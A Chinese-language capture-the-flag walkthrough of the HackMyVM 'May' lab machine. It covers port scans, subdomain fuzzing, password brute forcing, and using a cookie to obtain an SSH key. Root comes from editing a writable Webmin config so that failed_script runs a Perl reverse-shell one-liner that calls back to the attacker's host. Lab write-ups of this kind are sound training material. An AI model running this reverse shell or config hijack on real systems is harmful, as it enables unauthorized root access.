hack-my-vm-may

hack-my-vm-may

端口扫描

1
2
3
4
5
6
7
8
9
10
kali@kali [~] ➜  sudo nmap -p- -sT --min-rate 1000 192.168.1.59                                                                                  [23:43:32]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-21 23:50 CST
Nmap scan report for may.hmv (192.168.1.59)
Host is up (0.0029s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
10000/tcp open  snet-sensor-mgmt
MAC Address: 08:00:27:C3:A8:CC (Oracle VirtualBox virtual NIC)

开放三个端口,深度探测一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
kali@kali [~] ➜  sudo nmap -sT -sV -sC -p22,80,10000 192.168.1.59                                                                                [23:50:18]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 00:08 CST
Nmap scan report for may.hmv (192.168.1.59)
Host is up (0.00047s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 94:fb:c0:76:f2:b3:ff:4a:ed:61:6a:ae:a1:ca:86:c1 (RSA)
|   256 d0:29:99:fd:69:68:21:e3:b4:a6:48:e4:4e:a1:7e:f4 (ECDSA)
|_  256 2a:1b:1f:3d:ab:0a:00:5b:43:75:89:67:8a:98:21:df (ED25519)
80/tcp    open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: MAY
10000/tcp open  http    MiniServ 1.979 (Webmin httpd)
|_http-title: 200 — Document follows
|_http-server-header: MiniServ/1.979
MAC Address: 08:00:27:C3:A8:CC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

看来这个10000端口也是一个http服务

80端口渗透

首先设置host文件,至于为啥,访问80端口就可以看出该网址重定向到may.hmv

1
2
3
4
5
6
7
8
9
10
11
12
kali@kali [~] ➜  curl http://may.hmv/                                                                                                            [23:45:21]
<!doctype html>
<html lang="en">
<title>MAY</title>
<pre>
admin: Web is under construction. Use Intranet.
marie: Where are now the keys?
alice: Yes, where are?
admin: :'(
</pre>
</body>
</html>

访问得到的唯一有用的信息是三个用户,先做一个记录,进行目录爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://may.hmv/ -x txt,php,html         [23:46:13]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://may.hmv/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 194]
Progress: 882244 / 882248 (100.00%)
===============================================================
Finished
===============================================================

目录爆破无果,应该不从目录下手,那就子域名爆破了,给了解析的host文件,这就是必试的思路

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
kali@kali [~] ➜  wfuzz -w /home/kali/web_shell_toos/subdomains-top1million-5000.txt -u http://may.hmv -H "Host: FUZZ.may.hmv" --hh 185            [0:25:59]

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://may.hmv/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                    
=====================================================================

000000048:   200        11 L     31 W       406 Ch      "portal"                                                                                   
000000183:   200        10 L     31 W       405 Ch      "ssh"                                                                                      

Total time: 10.66197
Processed Requests: 4989
Filtered Requests: 4987
Requests/sec.: 467.9245

果然是有结果的,继续添加解析文件,访问后是一个登录框,要么弱密码,要不sql注入,这是最直接的

1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
kali@kali [~] ➜  sqlmap -r 1.txt                                                                                                                  [0:35:44]
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:35:48 /2025-02-22/

[00:35:48] [INFO] parsing HTTP request from '1.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
[00:35:50] [INFO] testing connection to the target URL
[00:35:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:35:50] [INFO] testing if the target URL content is stable
[00:35:51] [INFO] target URL content is stable
[00:35:51] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[00:35:51] [WARNING] (custom) POST parameter '#1*' does not appear to be dynamic
[00:35:51] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[00:35:51] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[00:35:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:35:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:35:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:35:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:35:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[00:35:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[00:35:51] [INFO] testing 'Generic inline queries'
[00:35:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[00:35:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[00:35:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[00:35:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[00:35:51] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:35:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[00:35:51] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] 

[00:35:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:35:52] [WARNING] (custom) POST parameter '#1*' does not seem to be injectable
[00:35:52] [INFO] testing if (custom) POST parameter '#2*' is dynamic
[00:35:52] [WARNING] (custom) POST parameter '#2*' does not appear to be dynamic
[00:35:52] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#2*' might not be injectable
[00:35:52] [INFO] testing for SQL injection on (custom) POST parameter '#2*'
[00:35:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:35:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:35:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:35:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:35:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[00:35:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[00:35:52] [INFO] testing 'Generic inline queries'
[00:35:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[00:35:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[00:35:52] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[00:35:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[00:35:52] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:35:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[00:35:52] [INFO] testing 'Oracle AND time-based blind'
[00:35:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:35:52] [WARNING] (custom) POST parameter '#2*' does not seem to be injectable
[00:35:52] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 00:35:52 /2025-02-22/

看样子是没有的,先作罢吧,弱口令爆破,找到密码

2

对比失败的报文,多了一个意义不明的cookie

1
Set-Cookie: Sweetcookie=HMVHMXHMVHMXHMVHMXHMVHMX

估计是携带了身份信息的,而且翻译过来是设置cookie的意思,加在以往访问的网站上应该会有所信息,一个是index.php,一个是check.php,check.php就是我们刚刚爆破的报文里面携带的路径

3

我们拿到了私钥

1
2
kali@kali [~] ➜  ssh-keygen -y -f x                                                                   [1:18:32]
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcfBDobru1KtzFM3ag4qmVVp7Rv6BV7TH9u0VKAYnLZsyhZzXioE6MTtwRw7y0QHzmYjd+0HKOnplVxBZ2YQW+oON6Ia+5y7Ryc7+RNhka57fj8/T7dMngOf3aUvmd54UkLfvIe2DEa/VdndpDqY39djqiQ+mOEQJmJ4fzzj0/69yWEGxdxk83BnW+RcCKdphPp7W8MkD3iXiKgOCP9LjyAW5HU4TGmzEz5zW6CAhx38aAXJUfLuL+F2bvynT2+eZaPyzDZdR3xcYgk5lEczHTEDDZ7OQcL3du7AvYpHF7P17mewsx8pRg0F3tP/XoB9LqVG+S8IE8AmxoE49vJw0p marie@may

私钥没有密码,而且显示了用户信息,登录即可

提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
kali@kali [~] ➜  chmod 600 x                                                                            [1:28:09]
kali@kali [~] ➜  ssh -i x marie@192.168.1.59                                                            [1:28:14]
Linux may 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 22 03:34:48 2021
marie@may:~$ whoami
marie
marie@may:~$ ls -la
total 36
drwxr-xr-x 4 marie marie 4096 Jul 22  2021 .
drwxr-xr-x 3 root  root  4096 Jul 21  2021 ..
-rw-r--r-- 1 marie marie  220 Jul 21  2021 .bash_logout
-rw-r--r-- 1 marie marie 3526 Jul 21  2021 .bashrc
drwxr-xr-x 3 marie marie 4096 Jul 22  2021 .local
-rw-r--r-- 1 marie marie  807 Jul 21  2021 .profile
drwx------ 2 marie marie 4096 Jul 22  2021 .ssh
-rw------- 1 marie marie   16 Jul 22  2021 user.txt
-rw------- 1 marie marie   49 Jul 22  2021 .Xauthority
marie@may:~$ cat user.txt|base64
SE1WbWFyaWVpc3JlYmVsCg==

我们一直没有看10000端口运行的是啥http服务,访问后发现是Webmin服务

4

1
2
3
4
5
6
marie@may:/etc/webmin$ sudo -l
Matching Defaults entries for marie on may:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User marie may run the following commands on may:
    (ALL) NOPASSWD: /usr/sbin/halt, /usr/sbin/reboot, /usr/sbin/poweroff

是一些重启,断电,关闭命令,都是关电脑的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
marie@may:~$ find / -name "webmin" 2>/dev/null
/etc/init.d/webmin
/etc/pam.d/webmin
/etc/webmin
/etc/webmin/webmin
/usr/share/doc/webmin
/usr/share/webmin
/usr/share/webmin/bin/webmin
/usr/share/webmin/gray-theme/webmin
/usr/share/webmin/webmin
/usr/share/webmin/authentic-theme/images/modules/webmin
/usr/share/webmin/authentic-theme/images/favicons/webmin
/usr/bin/webmin
/run/lock/subsys/webmin
/var/webmin
marie@may:~$ cd /etc/webmin
marie@may:/etc/webmin$ ls
acl               cluster-useradmin  fetchmail          installed.cache  logrotate       package-updates  quota         squid          useradmin
adsl-client       cluster-usermin    filemin            ipfilter         lpadmin         pam              raid          sshd           usermin
ajaxterm          cluster-webmin     filter             ipfw             lvm             pap              reload        start          var-path
apache            config             firewall           ipsec            mailboxes       passwd           restart       status         version
at                cpan               firewall6          iscsi-client     mailcap         perl-path        samba         stop           vgetty
backup-config     cron               firewalld          iscsi-server     man             phpini           sarg          stunnel        webalizer
bacula-backup     custom             first-install      iscsi-target     miniserv.conf   postfix          sendmail      syslog         webmin
bandwidth         dfsadmin           fsdump             iscsi-tgtd       miniserv.pem    postgresql       servers       syslog-ng      webmin.acl
bind8             dhcpd              grub               jabber           miniserv.users  ppp-client       shell         system-status  webmincron
change-user       dovecot            heartbeat          krb5             mon             pptp-client      shorewall     tcpwrappers    webminlog
cluster-copy      exim               htaccess-htpasswd  ldap-client      mount           pptp-server      shorewall6    telnet         wuftpd
cluster-cron      exports            idmapd             ldap-server      mysql           proc             smart-status  time           xinetd
cluster-passwd    fail2ban           inetd              ldap-useradmin   net             procmail         smf           tunnel
cluster-shell     failed.pl          init               login.pl         nis             proftpd          software      uninstall.sh
cluster-software  fdisk              inittab            logout.pl        openslp         qmailadmin       spam          updown
marie@may:/etc/webmin$ ls -la
total 536
drwxr-xr-x 116 root root 4096 Feb 21 11:01 .
drwxr-xr-x  74 root root 4096 Feb 21 10:21 ..
drwx--x--x   2 root bin  4096 Jul 22  2021 acl
drwx--x--x   2 root bin  4096 Jul 22  2021 adsl-client
drwx--x--x   2 root bin  4096 Jul 22  2021 ajaxterm
drwx--x--x   2 root bin  4096 Jul 22  2021 apache
drwx--x--x   2 root bin  4096 Jul 22  2021 at
drwx--x--x   2 root bin  4096 Jul 22  2021 backup-config
drwx--x--x   2 root bin  4096 Jul 22  2021 bacula-backup
drwx--x--x   2 root bin  4096 Jul 22  2021 bandwidth
drwx--x--x   2 root bin  4096 Jul 22  2021 bind8
drwx--x--x   2 root bin  4096 Jul 22  2021 change-user
drwx--x--x   2 root bin  4096 Jul 22  2021 cluster-copy
drwx--x--x   2 root bin  4096 Jul 22  2021 cluster-cron
drwx--x--x   2 root bin  4096 Jul 22  2021 cluster-passwd
drwx--x--x   2 root bin  4096 Jul 22  2021 cluster-shell
drwx--x--x   2 root bin  4096 Jul 22  2021 cluster-software
drwx--x--x   2 root bin  4096 Jul 22  2021 cluster-useradmin
drwx--x--x   2 root bin  4096 Jul 22  2021 cluster-usermin
drwx--x--x   2 root bin  4096 Jul 22  2021 cluster-webmin
-rw-r--r--   1 root root  427 Jul 22  2021 config
drwx--x--x   2 root bin  4096 Jul 22  2021 cpan
drwx--x--x   2 root bin  4096 Jul 22  2021 cron
drwx--x--x   2 root bin  4096 Jul 22  2021 custom
drwx--x--x   2 root bin  4096 Jul 22  2021 dfsadmin
drwx--x--x   2 root bin  4096 Jul 22  2021 dhcpd
drwx--x--x   2 root bin  4096 Jul 22  2021 dovecot
drwx--x--x   2 root bin  4096 Jul 22  2021 exim
drwx--x--x   2 root bin  4096 Jul 22  2021 exports
drwx--x--x   2 root bin  4096 Jul 22  2021 fail2ban
-rwxr-xr-x   1 root root  496 Jul 22  2021 failed.pl
drwx--x--x   2 root bin  4096 Jul 22  2021 fdisk
drwx--x--x   2 root bin  4096 Jul 22  2021 fetchmail
drwx--x--x   2 root bin  4096 Jul 22  2021 filemin
drwx--x--x   2 root bin  4096 Jul 22  2021 filter
drwx--x--x   2 root bin  4096 Jul 22  2021 firewall
drwx--x--x   2 root bin  4096 Jul 22  2021 firewall6
drwx--x--x   2 root bin  4096 Jul 22  2021 firewalld
-rw-r--r--   1 root root   14 Jul 22  2021 first-install
drwx--x--x   2 root bin  4096 Jul 22  2021 fsdump
drwx--x--x   2 root bin  4096 Jul 22  2021 grub
drwx--x--x   2 root bin  4096 Jul 22  2021 heartbeat
drwx--x--x   2 root bin  4096 Jul 22  2021 htaccess-htpasswd
drwx--x--x   2 root bin  4096 Jul 22  2021 idmapd
drwx--x--x   2 root bin  4096 Jul 22  2021 inetd
drwx--x--x   2 root bin  4096 Jul 22  2021 init
drwx--x--x   2 root bin  4096 Jul 22  2021 inittab
-rw-r--r--   1 root root 1174 Jul 22  2021 installed.cache
drwx--x--x   2 root bin  4096 Jul 22  2021 ipfilter
drwx--x--x   2 root bin  4096 Jul 22  2021 ipfw
drwx--x--x   2 root bin  4096 Jul 22  2021 ipsec
drwx--x--x   2 root bin  4096 Jul 22  2021 iscsi-client
drwx--x--x   2 root bin  4096 Jul 22  2021 iscsi-server
drwx--x--x   2 root bin  4096 Jul 22  2021 iscsi-target
drwx--x--x   2 root bin  4096 Jul 22  2021 iscsi-tgtd
drwx--x--x   2 root bin  4096 Jul 22  2021 jabber
drwx--x--x   2 root bin  4096 Jul 22  2021 krb5
drwx--x--x   2 root bin  4096 Jul 22  2021 ldap-client
drwx--x--x   2 root bin  4096 Jul 22  2021 ldap-server
drwx--x--x   2 root bin  4096 Jul 22  2021 ldap-useradmin
-rwxr-xr-x   1 root root  494 Jul 22  2021 login.pl
-rwxr-xr-x   1 root root  496 Jul 22  2021 logout.pl
drwx--x--x   2 root bin  4096 Jul 22  2021 logrotate
drwx--x--x   2 root bin  4096 Jul 22  2021 lpadmin
drwx--x--x   2 root bin  4096 Jul 22  2021 lvm
drwx--x--x   2 root bin  4096 Jul 22  2021 mailboxes
drwx--x--x   2 root bin  4096 Jul 22  2021 mailcap
drwx--x--x   2 root bin  4096 Jul 22  2021 man
-rw----rw-   1 root bin   979 Feb 21 11:01 miniserv.conf
-rw-------   1 root bin  2957 Jul 22  2021 miniserv.pem
-rw-------   1 root bin     9 Jul 22  2021 miniserv.users
drwx--x--x   2 root bin  4096 Jul 22  2021 mon
drwx--x--x   2 root bin  4096 Jul 22  2021 mount
drwx--x--x   2 root bin  4096 Jul 22  2021 mysql
drwx--x--x   2 root bin  4096 Jul 22  2021 net
drwx--x--x   2 root bin  4096 Jul 22  2021 nis
drwx--x--x   2 root bin  4096 Jul 22  2021 openslp
drwx--x--x   2 root bin  4096 Jul 22  2021 package-updates
drwx--x--x   2 root bin  4096 Jul 22  2021 pam
drwx--x--x   2 root bin  4096 Jul 22  2021 pap
drwx--x--x   2 root bin  4096 Jul 22  2021 passwd
-rw-r--r--   1 root root   14 Jul 22  2021 perl-path
drwx--x--x   2 root bin  4096 Jul 22  2021 phpini
drwx--x--x   2 root bin  4096 Jul 22  2021 postfix
drwx--x--x   2 root bin  4096 Jul 22  2021 postgresql
drwx--x--x   2 root bin  4096 Jul 22  2021 ppp-client
drwx--x--x   2 root bin  4096 Jul 22  2021 pptp-client
drwx--x--x   2 root bin  4096 Jul 22  2021 pptp-server
drwx--x--x   2 root bin  4096 Jul 22  2021 proc
drwx--x--x   2 root bin  4096 Jul 22  2021 procmail
drwx--x--x   2 root bin  4096 Jul 22  2021 proftpd
drwx--x--x   2 root bin  4096 Jul 22  2021 qmailadmin
drwx--x--x   2 root bin  4096 Jul 22  2021 quota
drwx--x--x   2 root bin  4096 Jul 22  2021 raid
-rwxr-xr-x   1 root root  164 Jul 22  2021 reload
-rwxr-xr-x   1 root root   55 Jul 22  2021 restart
drwx--x--x   2 root bin  4096 Jul 22  2021 samba
drwx--x--x   2 root bin  4096 Jul 22  2021 sarg
drwx--x--x   2 root bin  4096 Jul 22  2021 sendmail
drwx--x--x   2 root bin  4096 Jul 22  2021 servers
drwx--x--x   2 root bin  4096 Jul 22  2021 shell
drwx--x--x   2 root bin  4096 Jul 22  2021 shorewall
drwx--x--x   2 root bin  4096 Jul 22  2021 shorewall6
drwx--x--x   2 root bin  4096 Jul 22  2021 smart-status
drwx--x--x   2 root bin  4096 Jul 22  2021 smf
drwx--x--x   2 root bin  4096 Jul 22  2021 software
drwx--x--x   2 root bin  4096 Jul 22  2021 spam
drwx--x--x   2 root bin  4096 Jul 22  2021 squid
drwx--x--x   2 root bin  4096 Jul 22  2021 sshd
-rwxr-xr-x   1 root root  234 Jul 22  2021 start
drwx--x--x   2 root bin  4096 Jul 22  2021 status
-rwxr-xr-x   1 root root  359 Jul 22  2021 stop
drwx--x--x   2 root bin  4096 Jul 22  2021 stunnel
drwx--x--x   2 root bin  4096 Jul 22  2021 syslog
drwx--x--x   2 root bin  4096 Jul 22  2021 syslog-ng
drwx--x--x   2 root bin  4096 Jul 22  2021 system-status
drwx--x--x   2 root bin  4096 Jul 22  2021 tcpwrappers
drwx--x--x   2 root bin  4096 Jul 22  2021 telnet
drwx--x--x   2 root bin  4096 Jul 22  2021 time
drwx--x--x   2 root bin  4096 Jul 22  2021 tunnel
-rwxr-xr-x   1 root root  198 Jul 22  2021 uninstall.sh
drwx--x--x   2 root bin  4096 Jul 22  2021 updown
drwx--x--x   2 root bin  4096 Jul 22  2021 useradmin
drwx--x--x   2 root bin  4096 Jul 22  2021 usermin
-rw-r--r--   1 root root   12 Jul 22  2021 var-path
-rw-r--r--   1 root root    6 Jul 22  2021 version
drwx--x--x   2 root bin  4096 Jul 22  2021 vgetty
drwx--x--x   2 root bin  4096 Jul 22  2021 webalizer
drwx--x--x   2 root bin  4096 Jul 22  2021 webmin
-rw-------   1 root root  997 Jul 22  2021 webmin.acl
drwx--x--x   3 root bin  4096 Jul 22  2021 webmincron
drwx--x--x   2 root bin  4096 Jul 22  2021 webminlog
drwx--x--x   2 root bin  4096 Jul 22  2021 wuftpd
drwx--x--x   2 root bin  4096 Jul 22  2021 xinetd

发现一个我们可以编辑的配置文件,关于webmin的,而且这个webmin大概是以root身份启动的

1
2
root      1016   556  0 12:27 ?        00:00:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
root      1017   556  0 12:27 ?        00:00:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
marie@may:/etc/webmin$ cat miniserv.conf
port=10000
root=/usr/share/webmin
mimetypes=/usr/share/webmin/mime.types
addtype_cgi=internal/cgi
realm=Webmin Server
logfile=/var/webmin/miniserv.log
errorlog=/var/webmin/miniserv.error
pidfile=/var/webmin/miniserv.pid
logtime=168
ssl=1
no_ssl2=1
no_ssl3=1
no_tls1=1
no_tls1_1=1
ssl_honorcipherorder=1
no_sslcompression=1
env_WEBMIN_CONFIG=/etc/webmin
env_WEBMIN_VAR=/var/webmin
atboot=1
logout=/etc/webmin/logout-flag
listen=10000
denyfile=\.pl$
log=1
blockhost_failures=5
blockhost_time=60
syslog=1
ipv6=1
session=1
premodules=WebminCore
server=MiniServ/1.979
userfile=/etc/webmin/miniserv.users
keyfile=/etc/webmin/miniserv.pem
passwd_file=/etc/shadow
passwd_uindex=0
passwd_pindex=1
passwd_cindex=2
passwd_mindex=4
passwd_mode=0
preroot=authentic-theme
passdelay=1
failed_script=/etc/webmin/failed.pl
logout_script=/etc/webmin/logout.pl
cipher_list_def=1
login_script=/etc/webmin/login.pl
sudo=1
error_handler_403=403.cgi
error_handler_404=404.cgi
error_handler_401=401.cgi

这个我们可以编辑的配置文件中,failed_script参数指的是当我们登录失败时执行的pl脚本,那我们将其改为反弹shell的脚本,然后在失败登录一次即可

1
2
3
4
5
marie@may:~$ cat 1.pl 
perl -e 'use Socket;$i="192.168.1.5";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
marie@may:~$ chmod +x 1.pl
marie@may:~$ nano /etc/webmin/miniserv.conf 
marie@may:~$ sudo /usr/sbin/reboot

5

1
2
3
4
5
6
7
8
9
kali@kali [~] ➜  nc -lvnp 8888                                                          [1:42:33]
listening on [any] 8888 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.59] 40070
bash: cannot set terminal process group (389): Inappropriate ioctl for device
bash: no job control in this shell
root@may:/usr/share/webmin# id
id
uid=0(root) gid=0(root) groups=0(root)
root@may:/usr/share/webmin#